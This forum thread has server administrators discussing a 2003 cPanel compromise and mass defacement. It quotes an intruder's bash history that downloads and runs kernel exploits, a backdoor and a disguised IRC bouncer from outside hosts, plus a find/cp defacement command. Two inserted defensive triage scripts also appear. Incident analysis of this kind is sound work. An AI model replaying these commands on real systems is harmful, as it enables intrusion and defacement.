The Community Forums


new server got hacked

Discussion in 'General Discussion' started by brumie, Dec 11, 2003.

  1. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Just got hacked.
    Moving to a new server, and after a few hours it got hacked.

    All index.* files have been replaced,
    including all cPanel themes and all clients.

    So when you log on to http://server/cpanel
    or http://server/webmail
    all you see is the hacker page:
    http://vipixel.com/hacked.jpg

    I can delete the username techteam, whose uid is 0,
    but how do I remove the hidden trojan?
    It says it has a hidden pid:

    uid 0 account (techteam) - BAD!
    --> Hidden Pid detected! [pid 10]
    --> hidden from ps: [yes]
    --> hidden from kernel: [yes]

    Here's the log I could grab:
    Code:
    ls
    ./pt
    ./kmod
    ./own
    ./klogd
    ./kmod
    rm kmod
    rm -rf kmod
    wget www.viperhaxu.hpg.com.br/ptrace
    chmod ptrace
    chmod 777 ptrace
    ./ptrace
    wget www.skater0x.hpg.com.br/local/kmod
    chmod 777 kmod.1
    ./kmod.1
    ./newlocal
    gcc fedor.c -o fedor
    ls
    ./f
    uname -a
    chmod 777 f
    ./f
    id
    pwd
    wget www.skater0x.hpg.com.br/xpll/cancer
    echo SU3D OWNZ > index.txt
    chmod 777 cancer
    ./cancer index.txt
    ls
    rm bind.txt
    ls -la
    cat .bash_history
    ls
    ./kmod
    ./cbd
    ./cbd 10.28.88.142
    cat fedor.c
    ./f
    ./ptrace
    c
    ./pt
    z
    ls
    ls
    ./setuid
    id
    ./ptrace
    ./own
    ./ptrace
    wget www.creatividade.hpg.com.br/locals
    chmod 777 locals
    ./locals
    ./locals
    ./locals
    rm -rf locals
    ls
    ./ptrace
    echo lol >.bash_history
    ls
    ./td
    id
    ./pt
    id
    ./td
    ls
    w
    id
    mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
    cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
    wget thecoreteam.home.ro/pt
    chmod +x pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    wget www.geocities.com/sorin_smen/psybnc.tgz
    ls
    rm -rf *
    cd ..
    ls
    rm -rf *
    ls
    ./newlocal
    ./localroot
    ./own
    ./kmod
    rm -rf *
    chmod +wrx setuid
    id
    ls -all
    ls
    rm -rf sess_fc187590539417321dd72b37686e7e27
    cd www.geocities.com/sorin_smen/psybnc.tgz
    cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
    mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
    cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
    wget www.geocities.com/sorin_smen/psybnc.tgz
    tar zxvf psybnc.tgz
    cd psybnc
    ./psybnc
    kill -9 32751
    rm -rf psybnc.conf
    wget thecoreteam.home.ro/psybnc.conf
    mv psybnc "squid -D"
    ./"squid -D"
    exit
    id
    ./km
    ls
    ls -al km
    ./km
    ./km
    ./km;./km;./km
    exit
    
    I ran this:
    [~/apps/chkrootkit-0.42b]# ./chkrootkit
    Checking `bindshell'... INFECTED (PORTS: 465)
    but it seems to be a false alarm...

    How do I clearly remove the trojan file?
    Please, please help.
    FYI the server is updated to the latest kernel, 2.4.23,
    but we're still worried about this mass defacement attack.

    Mind sharing tips and tricks on security settings for WHM/cPanel?

    Thanks in advance,
    Brumie
     
  2. welo

    welo Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Someone was working fast then and knew you had a new box that wasn't patched (so it's likely someone you know). I have a friend who had a similar hack done on an unpatched box last spring. It's almost identical. I suggest you get ready to reimage, and be thankful it's a new install so you don't have to worry about complex backups.
     
  3. hot_wired13

    hot_wired13 Active Member

    Joined:
    Oct 17, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    127.0.0.1
    OK, let's get down to the basics, shall we?

    ptrace = LOCAL kernel exploit
    kmod = LOCAL kernel exploit

    So, how did he get in?
    He needed a shell, right?

    Simple. You must be using Red Hat 9. That's how ptrace+kmod worked. There is a similar exploit called ptrace-km3.c. It's both combined together, same way, but a lot faster.

    If you notice, he was rm-ing files (at the start of the logs). The only possibility would be because the exploits don't work. That means two things: 1. this is his first attempt on your box (or at least after the install); 2. he's an idiot who has a bad memory. Hackers do not usually rm their tools; they keep them for future use ;)

    Now, how did he get a shell on your box? Simple. Red Hat 9 has a REMOTE samba exploit which spawns a user on the box. Check your system logs, maybe you'd get a clue. If he's such an idiot that he doesn't clear bash history, you can bet he won't clear system logs.

    Also, the fact that he keeps using .com.br free webhosts (probably free, at least) most probably shows that he is living in .br. Same thing with Romanians, they love to use .ro freehosts. It's faster for them to upload xploits. (Well, the clever hacker would use a carded domain and his own server. He wouldn't be so stupid as to use a freehost - logs are all over the place.)

    Anyway, he didn't do a clean job, notice the chmodding and shit. If I were him, I'd write a ready-made bash script to provide me all the info I need, so you'd see almost nothing ;)

    Hmm, below are some *GUESSES* on what each file does:

    cancer = spreads whatever is in index.txt to every single index.* file. Very very very lame file, in my opinion.

    psybnc = as it says, an IRC bouncer.

    setuid = possibly to change his own userid? To change his uid to 0 so he'd be root.

    "squid -D" = psybnc, as I said above, disguised as a squid proxy. Could also imply that he has USED squid to set up proxies on other boxes and is familiar with the commands.

    newlocal and localroot = sounds like a rootkit to me.

    Oh, and yes, there's something about kmod and ptrace - the exploitation is NOT instant, it requires some time, but the ptrace-kmod3 is instant I think, haven't used it in a long time.

    Seriously, I think he has patched your box, maybe that's why he was running km at the last part? Hackers don't like other hackers in their box, lol.

    OK... now, how to track him down and kill him.
    1. Don't format the box... yet.
    2. Check out his psybnc stuff, as in the now "squid -D"...
    3. Check out the psybnc.conf. No point looking at the wget'ed copy, because it's a generic one. His password should be encrypted, but oh well... better than nothing.
    4. Add another ADMIN account to the psybnc conf and rehash it.
    5. Go in there, and wait wait wait, until he comes in. Since you're admin, you should be able to see his real IP address...
    6. Call the feds :)

    Et voila. There, you caught your hacker.
    However, removal of a rootkit is not exactly easy, lots of memory hooks and stuff.

    Prevention: ALWAYS use up2date if you're with Red Hat... set crons every 3 hours for up2date -p and 5 mins later up2date -u, should keep you very safe.

    Erm, if I'm wrong about anything, someone feel free to correct me. Thanks. If anyone needs help, I'm available at kelvin [at] hostform.net.

    Regards,
    Kelvin
    Hostform Internet Services
     
  4. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    You think I could borrow some of your knowledge and put it in my brain for a while... :eek:

    How long did it take you to learn all that? Any suggestions, sites, or resources you can provide that will help keep our boxes secure?

    I'm currently running RH9+APF+Tripwire... but I'm still clueless as to how to effectively check logs and maintain APF and Tripwire... :confused:

    Thanks in advance
     
  5. Nico

    Nico Well-Known Member

    Joined:
    Dec 5, 2001
    Messages:
    233
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Edmond, OK
    These SOBs have hit a few other servers this week. So far all I've found is the t0rn rootkit installed and all the index.* files replaced. You can correct all the cPanel index problems by changing your update prefs to the next release or down a release and running /scripts/updatenow and /scripts/upcp. Then I rm -rf /home/*/public_html/index*

    After that it's time to email the users to replace their index files.

    I also recommend recompiling the kernel and making sure Apache, PHP etc. are current.

    This is how they replaced the index files:

    188 lswget http://www.cimentsorigny.com/rula2.htm
    189 wget http://www.cimentsorigny.com/rula2.htm
    190 mv rula2.htm index.html
    191 find / -name "index.*" -exec cp /tmp/index.html {} \;
     
    #5 Nico, Dec 12, 2003
    Last edited: Dec 13, 2003
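    As an added example (not code from the thread), a small POSIX shell script that does the defensive counterpart of the `find / -name "index.*" -exec cp ...` line quoted above: it locates index.* files under a web root that are byte-identical to a recovered defacement page, or that share one checksum across many accounts, so the affected sites can be listed and restored from backup instead of deleting every index file. The /home/<user>/public_html layout and the reference file are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread. Finds the footprint of a mass
# defacement that copied one page over every index.* file.
# Assumption: paths under the web root contain no whitespace.

# Print "checksum path" for every index.* file under directory $1.
# cksum is POSIX, so this runs on any box without extra tools.
index_checksums() {
    find "$1" -type f -name 'index.*' -exec cksum {} \; |
        awk '{ print $1, $3 }'
}

# List index.* files under $1 whose content matches the reference
# file $2 (for example the defacement page recovered from /tmp).
# One path per line, ready to feed into a restore loop.
find_matching_index() {
    ref=$(cksum "$2" | awk '{ print $1 }')
    index_checksums "$1" | awk -v ref="$ref" '$1 == ref { print $2 }'
}

# Report checksums shared by at least $2 index files under $1, with
# the count. Legitimate sites rarely ship identical index pages, so
# a checksum that appears across many accounts is a defacement
# candidate even when no reference copy was recovered.
shared_index_checksums() {
    index_checksums "$1" | awk -v min="$2" '
        { count[$1]++ }
        END { for (c in count) if (count[c] >= min) print c, count[c] }'
}
```

    Run it against a copy of the web root first, e.g. `find_matching_index /home /tmp/index.html`, and review the list before restoring anything.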
  6. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Wow, thank you guys for the feedback,
    hot_wired & Nico,
    great explanation :)
    That helps me to learn security.

    Sorry for not being clear:
    it's Red Hat 7.3
    running the latest RELEASE tree.
    I did recompile the kernel to the latest, did some searching with chkrootkit and monitoring with iptraf, and it looks fine.

    tail /etc/rc.sysinit
    [ -r /proc/ksyms ] && /bin/cat /proc/ksyms) >/var/log/ksyms.0
    # create the crash indicator flag to warn on crashes, offer fsck with timeout
    touch /.autofsck
    sleep 1
    kill -TERM `/sbin/pidof getkey` >/dev/null 2>&1
    } &
    if [ "$PROMPT" != "no" ]; then
    /sbin/getkey i && touch /var/run/confirm
    fi
    wait

    Looks fine,
    BUT
    today I got an email from the server:
    Trojan Horses Detected by (WHM)
    Hidden Pid detected! [pid 10]
    hidden from ps: [yes]
    hidden from kernel: [yes]
    binary location: [/sbin/init]

    Oh gawd, again?
    Will it solve the problem if I just replace it with a trusted init?
    How the hell can I find a trustworthy init binary anyway?
    If I replace it with the original init from the CD, will this cause problems since I've already run updates here and there?


    Thanks in advance
    Brumie
     
  7. Nico

    Nico Well-Known Member

    Joined:
    Dec 5, 2001
    Messages:
    233
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Edmond, OK
    I've seen that a few times this week as well.

    You can delete that init file and replace it with one from the CD if you can locate it, or one from a like server. I have a clean archived version that I have been using; PM me if you'd like instructions on how to access and install that one.
     
  8. hot_wired13

    hot_wired13 Active Member

    Joined:
    Oct 17, 2003
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    127.0.0.1
    *faints* Red Hat 7.3? Sheesh, that's even MORE buggy than Red Hat 9... not only ptrace works, samba, ssh, proftpd, everything works lol.

    Actually, I'd recommend you just back up your stuff and reinstall. And BE at the datacenter or be online when that happens. The second after your box is online, use Red Hat's up2date. 100% trusted and safe. If, however, you want a Red Hat paid account for updating purposes... er, email me... kelvin [at] hostform.net... I have a *cough* paid *cough* RHN account which I don't use anymore, because I switched to FreeBSD... I'll lend it to you :)

    Yeah, you could probably replace some files... however, you never know if there are memory hooks or some stuff running... that's what I'm afraid of...
     
  9. compunet2

    compunet2 Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    310
    Likes Received:
    0
    Trophy Points:
    16
    By chance, were you or any of your users running the script My eGallery? You could check the apache logs, which would show it. Also, did you have /tmp set to noexec, nosuid?
     
  10. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    The tech found it: execution from the 4images gallery (nobody) to a tmp session.

    And the OS is reloaded now :|
    just to be sure...

    Thanks all for the help....
     
  11. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    My server has been hacked

    My server has also been hacked by IR4DEX GR0UP.

    All index files on the server have been defaced, and in some accounts all pages were defaced.

    Also, customers cannot log in to phpMyAdmin.

    I do not know the full extent of the damage done.

    I have been told I need to do an OS reload.

    Where can I get information on how to do this?

    Thanks
    Ivaserver
     
  12. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Re: My server has been hacked

    For an OS reload, you have to submit a ticket to your dedicated provider;
    before that you can reinstall cPanel:
    rm -rf /usr/local/cpanel/cpanel
    /scripts/updatenow
    /scripts/upcp
    /scripts/updateuserdomains2

    That will bring back cPanel, including phpMyAdmin.

    If you have a backup of customer data, you're safe, but if not... oh man, it hurts restoring all index.*
     
  13. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    Thanks for the help,

    it has helped a lot.

    phpMyAdmin is now OK.

    I have just received this email:

    IMPORTANT: Do not ignore this email.
    This message is to inform you that the
    account smurf has user id 0 (root privs). This could mean that
    your system was compromised (OwN3D). To be safe you should verify that your
    system has not be compromised.

    In this account there are 5 files:

    .bash_history

    passwd root
    root@space2 [~]# passwd root
    Changing password for user root.
    w




    .bash_logout

    # ~/.bash_logout

    clear




    .bash_profile

    # .bash_profile

    # Get the aliases and functions
    if [ -f ~/.bashrc ]; then
    . ~/.bashrc
    fi

    # User specific environment and startup programs

    PATH=$PATH:$HOME/bin

    export PATH
    unset USERNAME





    .bashrc

    # .bashrc

    # User specific aliases and functions

    # Source global definitions
    if [ -f /etc/bashrc ]; then
    . /etc/bashrc
    fi




    .emacs

    ;; Red Hat Linux default .emacs initialization file

    ;; Are we running XEmacs or Emacs?
    (defvar running-xemacs (string-match "XEmacs\\|Lucid" emacs-version))

    ;; Set up the keyboard so the delete key on both the regular keyboard
    ;; and the keypad delete the character under the cursor and to the right
    ;; under X, instead of the default, backspace behavior.
    (global-set-key [delete] 'delete-char)
    (global-set-key [kp-delete] 'delete-char)

    ;; Turn on font-lock mode for Emacs
    (cond ((not running-xemacs)
    (global-font-lock-mode t)
    ))

    ;; Visual feedback on selections
    (setq-default transient-mark-mode t)

    ;; Always end a file with a newline
    (setq require-final-newline t)

    ;; Stop at the end of the file, not just add lines
    (setq next-line-add-newlines nil)

    ;; Enable wheelmouse support by default
    (cond (window-system
    (mwheel-install)
    ))



    Do I just need to remove the account to stop the hackers' access?

    Thanks, Ivaserver
     
    #13 ivaserver, Dec 23, 2003
    Last edited: Dec 23, 2003
  14. brumie

    brumie Active Member

    Joined:
    Dec 9, 2003
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    Oh yes, just delete that uid.
    I saw that too and deleted the user line:
    pico /etc/passwd

    But believe it or not, there must be a hidden process.
    Run chkrootkit (search on this forum on how to install it),
    also check on tmp:

    cd /tmp
    ls -la

    Find weird, unusual files/directories there,
    but it'll be good if you reload the OS, get the kernel update and find some threads about securing WHM/cPanel; I found them very useful :)
     
  15. Diatone

    Diatone Well-Known Member

    Joined:
    Aug 22, 2001
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    Me too

    Mine got hacked by a group called dogm4 - same crap. I didn't have my kernel updated. Stupid me. First time in 5 years I've gotten hacked. Caught it soon though, and restored sites within the hour. Bastards. I actually was able to find the people who did this, and their IP, along with their phone, real e-mail, address, age, city, etc. They're in Brazil. Any charges I can file? Anything at all I can do?
     
  16. Diatone

    Diatone Well-Known Member

    Joined:
    Aug 22, 2001
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    http://www.delta5.com.br/mirror/topdefacer/

    Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.
     
  17. compunet2

    compunet2 Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    310
    Likes Received:
    0
    Trophy Points:
    16
    Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
    I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol
     
  18. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    My server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs.
     
  19. ivaserver

    ivaserver Well-Known Member

    Joined:
    Aug 9, 2002
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    deleted
     
    #19 ivaserver, Dec 24, 2003
    Last edited: Dec 24, 2003
  20. B12Org

    B12Org Well-Known Member

    Joined:
    Jul 15, 2003
    Messages:
    692
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle Washington
    cPanel Access Level:
    Root Administrator
    What counts as weird or unusual files/dirs?
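    An added example (not from any post in this thread) covering the two checks brumie describes in #14 and the question just asked: a passwd scan for extra uid-0 accounts like the `techteam` and `smurf` entries WHM reported, and a listing of the kinds of /tmp entries that stand out in the histories above (sess_* entries that are directories, executables, hidden directories). Both functions take their input as arguments so they can be run on copies; the scratch-directory layout is an assumption.

```shell
#!/bin/sh
# Added example, not from the thread. Quick post-compromise triage checks.

# Print every account with uid 0 other than root, which is what the
# WHM "user id 0 (root privs)" mail warns about. $1 is a passwd-format
# file (a copy of /etc/passwd, or the live one).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Flag entries directly under directory $1 that should not normally be
# in a scratch directory used for PHP sessions:
#   - sess_* entries that are directories (real PHP session entries are
#     plain files; the histories above show the attacker creating
#     sess_* directories to hide tools among them)
#   - regular files with the owner execute bit (dropped tools, compiled
#     local exploits)
#   - hidden directories (dot-prefixed names)
# Output is one line per finding: "<reason> <path>".
suspicious_tmp_entries() {
    dir=$1
    find "$dir" -mindepth 1 -maxdepth 1 -type d -name 'sess_*' |
        sed 's/^/session-dir /'
    find "$dir" -mindepth 1 -maxdepth 1 -type f -perm -u+x |
        sed 's/^/executable /'
    find "$dir" -mindepth 1 -maxdepth 1 -type d -name '.*' |
        sed 's/^/hidden-dir /'
}
```

    Anything listed is a starting point for `ls -la` and `file`, not proof of compromise by itself; a rootkit that hides processes from the kernel, as reported earlier in the thread, can also hide files, so a clean result does not clear the box.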
     